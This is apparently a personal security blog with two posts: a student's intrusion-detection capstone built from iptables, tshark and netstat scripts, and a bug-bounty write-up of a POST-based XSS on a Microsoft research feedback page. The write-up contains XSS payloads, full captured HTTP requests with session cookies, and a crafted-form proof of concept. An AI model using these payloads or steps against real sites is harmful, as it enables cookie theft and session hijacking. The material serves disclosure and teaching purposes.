Tuesday, 5 January 2016

CTRL+C, +V (Copy Paste) Best Idea To Build Capstone Projects

Hii again...
Hope you liked my previous post "Post XSS At : research.microsoft.com".

Finally its 8th semester the 4 years of fun was going to end in next 5 months and the gang decided to attend first day class on time as a rituals. Professors were well aware that, there will be full strengths on first day, the last day & the day before exams so, they were ready with there A-Bomb for students.
This time the A-Bomb was "Capstone Project". The 10 credit game changing 5 months task either put your grades inside tombstone or rise it above stars. So we hear about the task and with in a week we have to make a 4-5 persons group, choose project & mentors.

The group was made in less then a minute but choosing of project was a tough call so we decided to come up with as many ideas as possible in next 3 days. IIIrd day the team member gather out in class and contributed our ideas eg. shopping website, social networking website, skype like software, google drive like systems etc...

NOTE : Personal advice to students out there looking for projects :
1. Always choose the project that no one is making. [ Different Project ]
2. Project should be sound complex and tough to understand but easiest to program.

So, we thought of above guidelines and neglects the idea of making websites, software because they were so common, similar among other students & came to the conclusion that we are going to make a project related to cyber security as security will be least considerable among other students and professors.

But in cyber security we came across many projects like RAT, Anti-Virus, DMZ etc...
The projects were awesome but the problem was of practical implementation Eg. If we made RAT (Remote Administration Tool) the main task was to get remote connection of our victim PC. That was easy if victim has not disabled there firewall & anti-virus but while giving viva to professors there will be not point saying that "we have to disable the firewall of victim ." It will be a huge fail for the team. So, we go with the easiest one in the book called "IDS" (Intrusion Detection System) it was a perfect project it sounds difficult but once you understand the concept easy to code.

As a developer the biggest question after choosing the project was 3W1H....?????
How to start ?
When to start ?
Where we should start from ?
Who will start ?
The solutions in the books was simple SDLC (Systems Development Life Cycle) but it only works when you know about, what are our you going to start. We only have an idea that ids means "Intrusion Detection System" & its work is to do detection of intruder Eg. If the attacker is trying to get access to our system we should get an alert of his presence.
So ignoring the SDLC concept we started working blind, problem followed by solution concept. Now the ultimate problem was how to code ? which programming language should we choose.
The answer was make is as simple as you can for user & other programmers to understand so we choose Perl & Linux bash scripting.

The week pass we register our project & choose our mentor. The dead line for our first month Report was near and we didn't started our project. We have to show the interface and its features of our projects.By then we know what we have to do we categorized our system in four:
1. Firewall
2. Honeypot
3. DOS Detection  
4. Logs Management

& came with the interface. Our main objective was to create simple scripts for each category.
Eg. For firewall : IP, Port blocking etc...


Month, 1st we wrote simple scripts for Firewall like :
1. Blacklisting IP Address
2. Blacklisting MAC Address
3. Blacklisting Ports
4. Block Website
5. Block Ads
6. Backdoor scanner
7. Trojans scanner

We use simple trick to our use for building these scripts like...
for blacklisting IP, MAC, Ports we use IP Tables Command :

1. IP Blocking :
 iptables -A INPUT -s $ip -j DROP 

2. MAC Blocking : 
iptables -A INPUT -m mac --mac-source $mac -j DROP
iptables -A FORWARD -m mac --mac-source $mac -j DROP


3. Ports Blocking :
 iptables -A INPUT -p tcp --destination-port $Po -j DROP

4. Ads Block :
Parsing the IPS from http://www.spamhaus.org/drop/drop.lasso & blocking with iptables.

5. Backdoor Scanner
Comparing known backdoor signatures with source of the file we want to scan.

6. Blocking Website
using simple DNS HOST file IP Blocking Concept




Month 2nd Creating Honeypot.
Simplest way to understand honeypot is to pretend to be vulnerable for attackers attacks & trap attacker at the time of attack.


How to build a trap ?

Think like an attacker. Attacker always do foot printing, scanning before launching his attack its simple if you do not know about the target you can't move further.

so, building simple trap called PSAD (Port Scan Attack Detection)
In this if attacker try to use different type of N-Map Scan on our system we ill get the alert of IP address doing that scan.

Trick was use a network sniffer Eg. Wireshark, Tshark and create a rule to look for specific TCP flags in the packet that are coming from attacker side.

tshark -i $fa -f "ip proto 6 or ip proto 17" -R "tcp.flags == 16 or tcp.flags == 1 or tcp.flags == 2 or tcp.flags == 18 or tcp.flags == 41 or tcp.flags == 16 or tcp.flags == 0 or ip.len == 28 or icmp.type == 8"   

You must be wondering what is the above tshark command for ok the trick was to view all nmap scan in detail and check for which TCP flag is tried to used for scanning.

Eg. TCP Flags With Decimal Numbers Assigned :
FIN = 1
SYN = 2
RST = 4
PSH = 8
ACK = 16
URG = 32
ECE = 64
CWR = 128


Different Types Scan Using TCP Flags That you can filter out using tshark.

TCP Connect Scan
Filter : ip.proto == 6 and tcp.flags == 18

TCP SYN Scan
Filter : ip.proto == 6 and tcp.flags == 2

TCP FIN Scan
Filter : ip.proto == 6 and tcp.flags == 1

TCP XMAS Scan
Filter : ip.proto == 6 and tcp.flags == 41

TCP NULL Scan
Filter : ip.proto == 6 and tcp.flags == 0

TCP ACK Scan
Filter : ip.proto == 6 and tcp.flags == 16

UDP Scan
Filter : ip.proto == 17 and ip.len = 28



Month 3rd Writing Scripts for DOS / DDos Detection & Log Management.


1. ARP Poisoning Check
The trick was to compare Original Gateway MAC to after attack start MAC
Command Used  : arp -a $ip 

Create a program first store the original I MAC1 the compare the current MAC2 .
If Poison is not MAC1==MAC2
else
Poison is in process

2. HTTP DDos Check
do
check=$(netstat -nap | grep HTTP | wc -l)
if  [ $check -gt 20 ]


If Netstat is showing different IP address connection requesting for server in same time DDos is in process. 

3. UDP Dos Check
do
check=$(netstat -anp | grep 'udp' | wc -l)
if  [ $check -gt 20 ]


If Netstat is showing different IP address connection requesting for server in same time DDos is in process. 

4.TCP / IP Dos
use netstat -anp | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n | wc -l for seeing both tcp & udp

5. SYN Dos Check
do
check=$(netstat -nap | grep SYN | wc -l)
if  [ $check -gt 20 ]


If Netstat is showing different IP address connection requesting for server in same time DDos is in process.  

6. Ping Of Death Check


Sniff network & Check for the size of ICMP Buffer

tshark -i wlan0 -R "icmp.type == 8" -c 200


Log Managements :


In log management use of syslog, command like stat, faillog, last etc were used.

Linux log files were used, checked for update & modification :

/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp", 
"/var/log/secure","/root/.ksh_history", "/root/.bash_history",

"/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp",
"/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
"/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
 "/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
"/var/log/proftpd.xferlog", "/var/log/proftpd.access_log", 
"/var/log/httpd/error_log", "/var/log/httpsd/ssl_log", 
"/var/log/httpsd/ssl.access_log", "/etc/mail/access", 
 "/var/log/qmail", "/var/log/smtpd", "/var/log/samba", "/var/lock/samba", "/root/.Xauthority", 
"/var/log/poplog", "/var/log/news.all", "/var/log/spooler", 
"/var/log/news", "/var/log/news/news", "/var/log/news/news.all", 
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice",  "/var/log/news/suck.err", "/var/log/news/suck.notice", 
"/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks", 
"/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log", 
"/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"



So finally after 3 months we have completed our Project & started making Report.

Link For Report   : http://www.slideshare.net/raghavbisht9/personal-final-report 
Download Project : https://github.com/raghav007bisht/Intrusion-Detection-System-IDS-v5.0

Monday, 4 January 2016

Post XSS At : "research.microsoft.com"

Hii
I am Raghav & this is the story of how I managed get to get my name on Microsoft Security Researcher Acknowledgements for Microsoft Online Services (November 2015).

NOTE : I am writing my first POST plus not a Literature guy so any typos & grammatical errors in  my story Do Ignore.

Link : https://technet.microsoft.com/en-in/security/cc308589.aspx


I started my journey from January 2015 when I was working as Security Consultant & one day I thought "what the fuck I am doing with my life ? " & started asking myself some life changing questions. Although I got some experience & knowledge as I started having fun with hacking stuff since 2008. I was studying at High School then and like to Deface websites for fun, making viruses, using cryptography for cheating in exams & the list go on...

so, I looked up in the mirror & cursed the world & decided to switch from Security Consultant to Freelancer.
Now, If you starting as a freelancer and you do not have any connections Congratulations "You Are Screwed !!!".
Your own parents will curse you, as you sticked to them like a parasite and your friends plus others will give bull shit uncountable advice's.

So, putting all there advice's in trash, I started looking for Bug Bounty Programs & I registered myself to hackerone, bugcrowd, cobalt etc... started looking for public programs from vulnerability-lab but the biggest mistake I did was I started using Vulnerability Scanners and they were giving me millions of false positive plus hundreds of Duplicate Results/reports and wasted my exactly 2 months...:(

Now, after pin down to ground & loosing many times, I took my faith from vulnerability scanners & started believing in me and switched to manual vulnerability testing. As I was going to start testing I have to choose the target from hundreds of public available programs. At that time I was started working with python programming so I open python interpreter and make a random character generation program 4 line easy code ;
Here It goes ;
>>> import random
>>> import string
>>> a = string.letters
>>> random.choice(a)
Output : "w"

Now, I start searching the Bounty programs started with letter "w" in "http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php"
& I choose the first target "Wamba" out of other 10 Programs.


After around 2-3 days of manual testing I got my first Verified XSS Bug that pay-off 150$ & a Hall of Fame.
Link :  http://corp.wamba.com/en/developer/security/?fame

So, Finally I got a start...
Now one thing I know for sure that I have to give my best if I have to find bugs at Top Level Dinosaurs like Microsoft, google, facebook etc...
so I started Hunting for small fishes in pound for practice and I got many.

NOTE : Check my linkedIn profile for those fishes : https://in.linkedin.com/in/raghav-bisht-8a99b049

After exactly 8 months of practice & learning I choose Microsoft as my first target. You must be wondering why Microsoft ? Because of it Bug Bounty Scope. There scope is wide as they are doing bug bounty of online services, products like office, etc...

As my expertise is in Web Application, I choose to go with there Online Services. Now I have to choose the target as there are hundred of domains, sub-domains etc are out there. Having paranoia of being lucky I again open my random python program & this time its give the letter "R".
so I scan for sub-domains of microsoft using Acunetix Tool For Sub-domain Scanner & I got a domain "http://research.microsoft.com/en-us/"

Now, testing Begin's...

On November, 3rd 2015 Morning 2:19Am I Reported my First Bug to Microsoft That was " Open Redirection "


And I Failed....:(

Now on same day November, 3rd 2015 Afternoon 1:27 PM I Reported A verified XSS Bug To Microsoft.

NOTE : Exactly The Same Report :


Vulnerable Domain :
--------------------------------

http://research.microsoft.com/

Vulnerable Link :
---------------------------

http://research.microsoft.com/apps/mobile/feedback.aspx

Vulnerable Parameter :
-------------------------------------

hiddenReferer=

XSS Payload :
---------------------

javascript:alert(123456789)
javascript:alert(document.
domain)
javascript:alert("XSS____
ALERT_____!!!!_____:_____Hacked___By___Raghav")
Steps To Reproduce :
------------------------------
-
1. Go to vulnerable Link : http://research.microsoft.com/apps/mobile/feedback.aspx
2. Put data in form  and click on submit meanwhile add proxy & intercept HTTP Request.
Then,
Find Vulnerable parameter : hiddenReferer=
&
Put XSS Payload : javascript:alert(123456789)
3. Forward The Request...

Original Request :
--------------------------

POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/apps/mobile/feedback.aspx
Cookie: MC1=GUID=
22a3cdbfa8d5904b942b60e36305e4eb&HASH=bfcd&LV=201508&V=4&LU=1441034037093;

A=I&I=
AxUFAAAAAAAeCQAApxclCNxGFk+1KDeEOKYm2A!!&V=4; MUID=3CE4D5FFCA896F5712EFDDF4CB966E2D;

_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
22a3cdbfa8d5904b942b60e36305e4eb&CS=3&LV=201509&V=1;

km_ai=
FA8dlGEvWq66GJiPA83Nhvzj9mY%3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26;

WT_FPC=id=
220af3c63b6e33379221442103020970:lv=1446427090307:ss=1446427090307; WT_NVR_RU=0=technet:1=:2=;

omniID=1445758143494_c04d_
29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0=64028a0f7e8a4846ac5da7cca81d6ddc
Connection: keep-alive
Content-Type: application/x-www-form-
urlencoded
Content-Length: 452

__VIEWSTATE=%
2FwEPDwUJLTgzMTg5OTc5ZGShzpE5tzmEw6CKkKDvGHntFLidc5imff8w7mu2zy%2FLMQ%3D

%3D&__VIEWSTATEGENERATOR=
716BEBFC&__EVENTVALIDATION=

%
2FwEdAARKJNO6sKLVvRzw7zztCu4VtMM203w3pCXVfEXN8x4O0jpn2Pr6XjNySqjv2083yVfNgUlRChClrK8AcSkpyD8s

%2Fz5WZ7D4I2h2W9EhPlJLX2gF%
2BinlORjyb3MDfBMo%2F9Y%3D&ctl00%24bodyPlaceholder

%24hiddenReferer=&Content=1&
Design=2&Usability=3&Overall=4&ctl00%24bodyPlaceholder

%24commentTxt=asadas&ctl00%
24bodyPlaceholder%24submitBtn=Submit

Edited Request :
-------------------------

POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/apps/mobile/feedback.aspx
Cookie: MC1=GUID=
22a3cdbfa8d5904b942b60e36305e4eb&HASH=bfcd&LV=201508&V=4&LU=1441034037093;

A=I&I=
AxUFAAAAAAAeCQAApxclCNxGFk+1KDeEOKYm2A!!&V=4; MUID=3CE4D5FFCA896F5712EFDDF4CB966E2D;

_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
22a3cdbfa8d5904b942b60e36305e4eb&CS=3&LV=201509&V=1;

km_ai=
FA8dlGEvWq66GJiPA83Nhvzj9mY%3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26;

WT_FPC=id=
220af3c63b6e33379221442103020970:lv=1446427090307:ss=1446427090307; WT_NVR_RU=0=technet:1=:2=;

omniID=1445758143494_c04d_
29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0=64028a0f7e8a4846ac5da7cca81d6ddc
Connection: keep-alive
Content-Type: application/x-www-form-
urlencoded
Content-Length: 470

__VIEWSTATE=%
2FwEPDwUJLTgzMTg5OTc5ZGTXCl2373301Rpe5vIISbXvtNenkjedT%2Bw1VGl4ldsRqw%3D

%3D&__VIEWSTATEGENERATOR=
716BEBFC&__EVENTVALIDATION=

%
2FwEdAAR2zlRPRPhJi19IJ5naZBSPtMM203w3pCXVfEXN8x4O0jpn2Pr6XjNySqjv2083yVfNgUlRChClrK8AcSkpyD8sBCl6HiMzA

gi%
2F4d3G3Luo2MkPYCKPbIHIh3MWPVPWxGM%3D&ctl00%24bodyPlaceholder%24hiddenReferer=javascript:alert

(123456789)&Content=1&Design=
2&Usability=3&Overall=4&ctl00%24bodyPlaceholder

%24commentTxt=m&ctl00%
24bodyPlaceholder%24submitBtn=Submit

Response :
------------------

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 07:23:06 GMT
Content-Length: 8961
NOTE : POC Attached...!!!



And I Failed Again....:(

Now as we all know every story have 3 Sections The Start, The Mid & The "Twist".

As My Bug was Shutdown By MSRC Team & they says its a "SELF-XSS" I have to make my Bug Impact-full for doing So,

1. I checked for X-Frame Headrer In Response and check weather the website is Faming Inside The HTML <IFRAME> Tag.

2. Always check for document.cookie XSS Payload <script>alert(document.cookie)</script> In my case the document.cookie payload doesn't works because I have not registered to website & my browser do not contain any session. SO, this was my mistake, then I register to site & apply the document.cookie Payload the "Cookie" Pop Up box appears which help me to increase the Severity Of the Bug.

 

SO, My only task left was to make my bug Severity As High As Possible For ding So ;
Check Out he exact Words Of My 3rd Reply To MSRC Team...

Respected...
As per POC for my earlier mail...
That the POST XSS page can be created and it can be Exploited...[Source : http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html]
Steps To Reproduce For POST XSS Exploitation :
------------------------------------------------------------------------------


1. Save the vulnerable Page in local system : http://research.microsoft.com/apps/mobile/feedback.aspx
2. Edit source code and add :

</p><form name="aspnetForm" method="post" action="http://research.microsoft.com/apps/mobile/feedback.aspx" id="aspnetForm">

<input name="ctl00$bodyPlaceholder$hiddenReferer" id="ctl00_bodyPlaceholder_
hiddenReferer" type="hidden" value="javascript:alert(document.cookie)">

3. Run in page in Local system & click on submit.
4. When form is successfully submitted Click on  "Hyperlinked : Click" To Execute XSS Payload.
Conclusions :
---------------------

1. Attacker can host the page and ask for feedback's.
2. Missing of "X-Frame-Options: sameorigin " Header in Response can give advantage to attacker for XFS Attack [Source : https://www.owasp.org/index.php/Cross_Frame_Scripting] [ POC Screenshot Attached : XFS-Microsoft.png ]
NOTE : Video POC, Screenshots & Edited POST Request Page Is Attached...!!!


Video POC : https://www.youtube.com/watch?v=uokq33ssLdc

So Finally On November 17th 2015 I got the confirmation of Bug Fixed...




Thank You....!!!!



- Raghav Bisht

Getting started with AMF Flash Application Penetration Testing !

What is Action Message Format (AMF) ? TL;DR; AMF is a binary message serialization format geared for remote procedure calls, native to the...